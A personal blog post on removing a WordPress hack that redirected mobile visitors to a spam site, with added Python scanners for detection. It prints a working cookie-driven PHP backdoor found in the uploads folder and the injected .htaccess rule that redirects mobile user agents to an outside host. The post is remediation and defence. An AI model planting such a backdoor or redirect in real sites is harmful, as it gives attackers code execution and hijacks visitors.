
Fixing a WordPress Redirect Hack


So I got a frantic call from my BFF who said, Daniel, your Science Fiction novels are so good. Can you help me fix my website? This BFF obviously knows how to preface a question, so I agreed to take a look. What I found was both confusing and arousing, and after fixing it, I said to myself, Daniel, your Science Fiction novels are so good, but you’re never going to remember how to fix this. That brings us to this blog post, wherein I tell you how to stop your WordPress website from redirecting to a shitty spam site, specifically when accessed via a mobile device.

The fact that the redirect only happens on mobile devices was quite interesting, but trying to investigate on an iPhone is pretty much impossible. Luckily, Chrome has you covered. Just hit F12 to open Developer Tools, and toggle the device toolbar (CTRL-SHIFT-M). Then you can trick the website into thinking you're an iPhone and trigger the redirect. I did just that, tried to look at the network events, JavaScript debugger, etc., but found nothing!

The redirect was taking me to a .bid site, so I grepped for that word in the WordPress install but didn’t find it there either. A quick Google search turned up a lot of advice about looking for encoded PHP in the theme files, but they were all clean. Then I turned my attention to the uploads folder.

I found this file and couldn’t figure out what it did.

daniel@bffserver [~]# cat psvkwrmv.php.fart
<?php

$oewzo=$_COOKIE;          // alias of all request cookies
$ycke=$oewzo[zutc];       // cookie "zutc" names a function to call (typically a decoder such as base64_decode)
if($ycke){
 $ojaf=$ycke($oewzo[yzda]);$gpjc=$ycke($oewzo[kvyi]);$fyup=$ojaf("",$gpjc);$fyup();
 // decode cookie "yzda" (a function-builder name, typically create_function) and
 // cookie "kvyi" (PHP code), build a function from that code and run it: a backdoor
 // whose payload lives only in the attacker's request, never on disk
}

I ran it through the hex, base64, and PHP decoders but nothing came up, so I renamed it to a harmless .fart file and moved it out of the uploads directory.
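
The reason the decoders come up empty is that the file contains no payload: the function names and the code arrive inside cookies at request time. An added detection example (not code from the original post) that flags this shape, a request-controlled value used as a function name, and lists PHP files under an uploads tree, where there should be none; the two PHP snippets are constructed samples:

```python
import os
import re

# Constructed sample with the shape of the uploads file shown above
# (a $_COOKIE-sourced value used as a function name); not the original bytes.
SUSPECT_SRC = """<?php
$oewzo=$_COOKIE;
$ycke=$oewzo[zutc];
if($ycke){
 $ojaf=$ycke($oewzo[yzda]);$gpjc=$ycke($oewzo[kvyi]);$fyup=$ojaf("",$gpjc);$fyup();
}
"""
# Constructed benign sample: reads a cookie but never executes it.
BENIGN_SRC = """<?php
$theme = isset($_COOKIE['theme']) ? $_COOKIE['theme'] : 'light';
echo htmlspecialchars($theme);
"""

def cookie_backdoor_indicators(src: str) -> list[str]:
    """Return names of variables derived from request input (cookie/GET/POST)
    that are then used as a function name: $var(...). Static decoders find
    nothing in such a file because the real function names and code only
    arrive at request time."""
    tainted = set(re.findall(
        r'\$(\w+)\s*=\s*\$_(?:COOKIE|REQUEST|GET|POST)\s*;', src))
    # Propagate taint through $a = $b[...] and $a = $b(...) in source order.
    for var, source in re.findall(r'\$(\w+)\s*=\s*\$(\w+)\s*[\[(]', src):
        if source in tainted or source.startswith('_'):
            tainted.add(var)
    called = set(re.findall(r'\$(\w+)\s*\(', src))
    return sorted(called & tainted)

def php_files_under(root: str) -> list[str]:
    """List files with a PHP-executable extension (double extensions such as
    .php.fart included) anywhere under root; wp-content/uploads should have none."""
    php_ext = re.compile(r'\.(php\d?|phtml|phar)(\.|$)', re.IGNORECASE)
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if php_ext.search(name):
                hits.append(os.path.join(dirpath, name))
    return sorted(hits)

if __name__ == '__main__':
    print(cookie_backdoor_indicators(SUSPECT_SRC))  # ['fyup', 'ojaf', 'ycke']
    print(cookie_backdoor_indicators(BENIGN_SRC))   # []
```

Run `php_files_under('/path/to/wp-content/uploads')` on the real tree and feed each hit to `cookie_backdoor_indicators`; any non-empty result is a file to pull for review.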

Then I found the culprit! Here are the contents of the .htaccess file in the uploads directory:

RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_USER_AGENT} android|bb\d+|meego|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge\ |maemo|midp|mmp|mobile.+firefox|netfront|opera\ m(ob|in)i|palm(\ os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows\ ce|xda|xiino [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a\ wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r\ |s\ )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1\ u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp(\ i|ip)|hs\-c|ht(c(\-|\ |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac(\ |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt(\ |\/)|klon|kpt\ |kwc\-|kyo(c|k)|le(no|xi)|lg(\ g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-|\ |o|v)|zz)|mt(50|p1|v\ )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v\ )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-|\ )|webc|whit|wi(g\ |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-) [NC]
RewriteRule ^$ http://luxurytds.com/go.php?sid=1 [R,L]

You son of a bitch .htaccess file!

Sadly, whatever made those edits also touched the .htaccess files in a bunch of other directories, including the root .htaccess file, which should look like this:

dverast@dougherty:~/danielverastiqui.com$ cat .htaccess

# BEGIN WordPress

RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]

If you need to find all the affected .htaccess files quickly, you can use grep:

daniel@bffserver [~]# grep -lR "luxurytds.com" .
grep: ./access-logs: No such file or directory
./www/blog/backup-1408304576-wp-admin/.htaccess
./www/blog/backup-1408304576-wp-includes/.htaccess
./www/blog/backup-1500088171-wp-admin/.htaccess
./www/blog/backup-1500088171-wp-includes/.htaccess
./www/blog/wp-content/backup-1500088171-themes/.htaccess
./www/blog/wp-content/backup-1408304576-themes/.htaccess
./www/blog/wp-content/backup-1500088171-plugins/cherry-lazy-load/.htaccess
./www/blog/wp-content/backup-1500088171-plugins/motopress-content-editor/.htaccess
./www/blog/wp-content/backup-1500088171-plugins/cherry-bgslider-plugin/.htaccess
./www/blog/wp-content/backup-1500088171-plugins/.htaccess
./www/blog/wp-content/backup-1408304576-plugins/.htaccess
./www/cgi-bin/.htaccess
./public_html/blog/backup-1408304576-wp-admin/.htaccess
./public_html/blog/backup-1408304576-wp-includes/.htaccess
./public_html/blog/backup-1500088171-wp-admin/.htaccess
./public_html/blog/backup-1500088171-wp-includes/.htaccess
./public_html/blog/wp-content/backup-1500088171-themes/.htaccess
./public_html/blog/wp-content/backup-1408304576-themes/.htaccess
./public_html/blog/wp-content/backup-1500088171-plugins/cherry-lazy-load/.htaccess
./public_html/blog/wp-content/backup-1500088171-plugins/motopress-content-editor/.htaccess
./public_html/blog/wp-content/backup-1500088171-plugins/cherry-bgslider-plugin/.htaccess
./public_html/blog/wp-content/backup-1500088171-plugins/.htaccess
./public_html/blog/wp-content/backup-1408304576-plugins/.htaccess
./public_html/cgi-bin/.htaccess
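
The grep above only finds files that mention the one host you already know about. An added example (not code from the original post) that instead audits every .htaccess in a tree for what the injected rule does: an absolute-URL RewriteRule to a host you don't own, with a note when the preceding RewriteCond tests the User-Agent. The two config samples are constructed (host as quoted above), and the owned host `example.com` is an assumption:

```python
import os
from urllib.parse import urlparse

# Constructed samples: the shape of the injected uploads/.htaccess and the WordPress root block.
INJECTED = """RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_USER_AGENT} android|iphone|ipod|mobile [NC]
RewriteRule ^$ http://luxurytds.com/go.php?sid=1 [R,L]
"""
CLEAN = r"""# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
"""

def audit_htaccess(text: str, own_hosts: set[str]) -> list[str]:
    """Flag RewriteRules targeting a host we do not own; mark the ones whose
    preceding RewriteConds tested the User-Agent (the mobile-only cloaking)."""
    findings, ua_conditioned = [], False
    for lineno, raw in enumerate(text.splitlines(), 1):
        parts = raw.strip().split(None, 3)       # directive, arg, arg, flags
        if not parts or parts[0].startswith('#'):
            continue
        directive = parts[0].lower()
        if directive == 'rewritecond' and len(parts) > 1:
            ua_conditioned |= 'HTTP_USER_AGENT' in parts[1].upper()
        elif directive == 'rewriterule':
            host = urlparse(parts[2]).hostname if len(parts) > 2 else None
            if host and host not in own_hosts:
                kind = 'UA-cloaked' if ua_conditioned else 'unconditional'
                findings.append(f'line {lineno}: {kind} external redirect to {host}')
            ua_conditioned = False               # conds apply to one rule only
    return findings

def scan_tree(root: str, own_hosts: set[str]) -> dict[str, list[str]]:
    """Audit every .htaccess under root (backup-* copies included)."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        if '.htaccess' in files:
            path = os.path.join(dirpath, '.htaccess')
            with open(path, encoding='utf-8', errors='replace') as fh:
                hits = audit_htaccess(fh.read(), own_hosts)
            if hits:
                report[path] = hits
    return report
```

`scan_tree('/home/bff/www', {'example.com'})` returns the offending paths with their findings; the clean WordPress block yields nothing because its targets are `-` and `/index.php`, not absolute URLs.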

After I deleted every .htaccess file and replaced them with the default or recommended versions, the site stopped redirecting. Success!

However:

Photo by Tom The Photographer on Unsplash

Published in Software

© 2018 Daniel Verastiqui